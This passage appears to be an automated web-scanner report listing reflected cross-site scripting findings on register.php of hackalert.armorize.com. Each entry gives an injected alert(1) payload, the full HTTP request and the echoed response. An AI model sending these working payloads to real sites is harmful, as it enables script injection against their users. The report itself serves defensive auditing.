2.55. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6823"-alert(1)-"9033c12b731 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jsd6823"-alert(1)-"9033c12b731/ajaxInterface.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:17:15 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsd6823"-alert(1)-"9033c12b731/ajaxInterface.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.56. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9d646%3balert(1)//fb3b62f33e5 was submitted in the REST URL parameter 3. This input was echoed as 9d646;alert(1)//fb3b62f33e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js9d646%3balert(1)//fb3b62f33e5/ajaxInterface.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:17:26 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js9d646;alert(1)//fb3b62f33e5/ajaxInterface.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.57. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3a955%3balert(1)//b478ccb9948 was submitted in the REST URL parameter 4. This input was echoed as 3a955;alert(1)//b478ccb9948 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js3a955%3balert(1)//b478ccb9948 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:19:44 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/ajaxInterface.js3a955;alert(1)//b478ccb9948?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.58. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f52"-alert(1)-"9203f59f7c4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js80f52"-alert(1)-"9203f59f7c4 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:31 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/ajaxInterface.js80f52"-alert(1)-"9203f59f7c4?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.59. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a317c"><script>alert(1)</script>d80220df516 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/a317c"><script>alert(1)</script>d80220df516/_js/datepicker.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:57:53 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/a317c"><script>alert(1)</script>d80220df516/_js/datepicker.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.60. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed003"-alert(1)-"31f203daed7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Ced003"-alert(1)-"31f203daed7/_js/datepicker.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:59:24 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<ed003"-alert(1)-"31f203daed7/_js/datepicker.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.61. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a8bb%3balert(1)//770fc431939 was submitted in the REST URL parameter 2. This input was echoed as 9a8bb;alert(1)//770fc431939 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C9a8bb%3balert(1)//770fc431939/_js/datepicker.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:51 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<9a8bb;alert(1)//770fc431939/_js/datepicker.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.62. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e9a10%3balert(1)//c68165ed25 was submitted in the REST URL parameter 3. This input was echoed as e9a10;alert(1)//c68165ed25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_jse9a10%3balert(1)//c68165ed25/datepicker.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:06:49 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jse9a10;alert(1)//c68165ed25/datepicker.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.63. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a4e4"-alert(1)-"9fb18383382 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js7a4e4"-alert(1)-"9fb18383382/datepicker.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:06:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js7a4e4"-alert(1)-"9fb18383382/datepicker.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.64. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload af2ad%3balert(1)//23c1c2aca98 was submitted in the REST URL parameter 4. This input was echoed as af2ad;alert(1)//23c1c2aca98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.jsaf2ad%3balert(1)//23c1c2aca98 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:19 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/datepicker.jsaf2ad;alert(1)//23c1c2aca98?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.65. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab26a"-alert(1)-"d481389cb03 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.jsab26a"-alert(1)-"d481389cb03 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:25 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/datepicker.jsab26a"-alert(1)-"d481389cb03?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.66. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2864d%3balert(1)//0b9758833f1 was submitted in the REST URL parameter 2. This input was echoed as 2864d;alert(1)//0b9758833f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C2864d%3balert(1)//0b9758833f1/_js/doFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:50 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<2864d;alert(1)//0b9758833f1/_js/doFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.67. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42087"><script>alert(1)</script>e5477b0b5c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/42087"><script>alert(1)</script>e5477b0b5c0/_js/doFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:58:37 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
